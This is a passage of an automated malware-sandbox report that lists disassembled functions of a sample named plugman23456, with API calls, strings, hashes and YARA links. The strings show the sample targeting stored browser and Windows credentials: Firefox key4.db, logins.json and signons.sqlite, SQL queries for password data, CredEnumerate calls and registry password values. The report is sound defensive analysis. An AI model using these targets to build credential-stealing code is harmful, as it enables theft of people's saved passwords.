                          Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                          • key4.db, xrefs: 00406756
                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                          • , xrefs: 00406834
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$memsetstrlen
                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                          • API String ID: 3614188050-3983245814
                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                          Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                          • API String ID: 710961058-601624466
                          • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                          • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                          Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: sprintf$memset$_mbscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 3402215030-3842416460
                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                          Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                            • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                            • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                          • strlen.MSVCRT ref: 0040F139
                          • strlen.MSVCRT ref: 0040F147
                          • memset.MSVCRT ref: 0040F187
                          • strlen.MSVCRT ref: 0040F196
                          • strlen.MSVCRT ref: 0040F1A4
                          • memset.MSVCRT ref: 0040F1EA
                          • strlen.MSVCRT ref: 0040F1F9
                          • strlen.MSVCRT ref: 0040F207
                          • _strcmpi.MSVCRT ref: 0040F2B2
                          • _mbscpy.MSVCRT ref: 0040F2CD
                          • _mbscpy.MSVCRT ref: 0040F30E
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                          • String ID: logins.json$none$signons.sqlite$signons.txt
                          • API String ID: 1613542760-3138536805
                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                          Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                          • API String ID: 1012775001-1343505058
                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                          Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00444612
                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                          • strlen.MSVCRT ref: 0044462E
                          • memset.MSVCRT ref: 00444668
                          • memset.MSVCRT ref: 0044467C
                          • memset.MSVCRT ref: 00444690
                          • memset.MSVCRT ref: 004446B6
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                          • memcpy.MSVCRT ref: 004446ED
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                          • memcpy.MSVCRT ref: 00444729
                          • memcpy.MSVCRT ref: 0044473B
                          • _mbscpy.MSVCRT ref: 00444812
                          • memcpy.MSVCRT ref: 00444843
                          • memcpy.MSVCRT ref: 00444855
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset$strlen$_mbscpy
                          • String ID: salu
                          • API String ID: 3691931180-4177317985
                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                          Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                          • API String ID: 2449869053-232097475
                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                          Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                          Download Yara Rule
                          APIs
                          • sprintf.MSVCRT ref: 0040957B
                          • LoadMenuA.USER32(?,?), ref: 00409589
                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                          • DestroyMenu.USER32(00000000), ref: 004095A7
                          • sprintf.MSVCRT ref: 004095EB
                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                          • memset.MSVCRT ref: 0040961C
                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                          • DestroyWindow.USER32(00000000), ref: 0040965C
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                          • String ID: caption$dialog_%d$menu_%d
                          • API String ID: 3259144588-3822380221
                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                          Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                          • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                          • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                          • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                          • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                          • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                          • API String ID: 2449869053-4258758744
                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                          Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                          • memset.MSVCRT ref: 0040F84A
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                          • LocalFree.KERNEL32(?), ref: 0040F92C
                          • RegCloseKey.ADVAPI32(?), ref: 0040F937
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                          • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                          • String ID: Creds$ps:password
                          • API String ID: 551151806-1872227768
                          • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                          • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                          • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                          • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                          Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                          Download Yara Rule
                          APIs
                          • wcsstr.MSVCRT ref: 0040426A
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                          • _mbscpy.MSVCRT ref: 004042D5
                          • _mbscpy.MSVCRT ref: 004042E8
                          • strchr.MSVCRT ref: 004042F6
                          • strlen.MSVCRT ref: 0040430A
                          • sprintf.MSVCRT ref: 0040432B
                          • strchr.MSVCRT ref: 0040433C
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                          • String ID: %s@gmail.com$www.google.com
                          • API String ID: 3866421160-4070641962
                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                          Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • _mbscpy.MSVCRT ref: 00409749
                          • _mbscpy.MSVCRT ref: 00409759
                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                          • _mbscpy.MSVCRT ref: 004097A1
                          • memset.MSVCRT ref: 004097BD
                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                          • String ID: TranslatorName$TranslatorURL$general$strings
                          • API String ID: 1035899707-3647959541
                          • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                          • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                          Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                          • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                          • SelectObject.GDI32(?,?), ref: 0040CACC
                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                          • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                            • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                            • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                            • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                          • LoadCursorA.USER32(00000067), ref: 0040CB2E
                          • SetCursor.USER32(00000000), ref: 0040CB35
                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                          • SetFocus.USER32(?), ref: 0040CB92
                          • SetFocus.USER32(?), ref: 0040CC0B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                          • String ID:
                          • API String ID: 1416211542-0
                          • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                          • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                          • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                          • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                          Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                          • API String ID: 2360744853-2229823034
                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                          Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                          Download Yara Rule
                          APIs
                          • strchr.MSVCRT ref: 004100E4
                          • _mbscpy.MSVCRT ref: 004100F2
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                          • _mbscpy.MSVCRT ref: 00410142
                          • _mbscat.MSVCRT ref: 0041014D
                          • memset.MSVCRT ref: 00410129
                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                            • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                          • memset.MSVCRT ref: 00410171
                          • memcpy.MSVCRT ref: 0041018C
                          • _mbscat.MSVCRT ref: 00410197
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                          • String ID: \systemroot
                          • API String ID: 912701516-1821301763
                          • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                          • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                          Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                          • memcpy.MSVCRT ref: 00410961
                          • CoTaskMemFree.OLE32(00000000), ref: 00410970
                          Strings
                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FromStringUuid$FreeTaskmemcpy
                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                          • API String ID: 1640410171-2022683286
                          • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                          • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                          • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                          • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                          Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$strlen
                          • String ID: -journal$-wal$immutable$nolock
                          • API String ID: 2619041689-3408036318
                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                          Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$strlen
                          • String ID:
                          • API String ID: 4288758904-3916222277
                          • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                          • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                          • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                          • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                          Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                          • wcslen.MSVCRT ref: 0040874A
                          • _wcsncoll.MSVCRT ref: 00408794
                          • memset.MSVCRT ref: 0040882A
                          • memcpy.MSVCRT ref: 00408849
                          • wcschr.MSVCRT ref: 0040889F
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                          Strings
                          Memory Dump Source
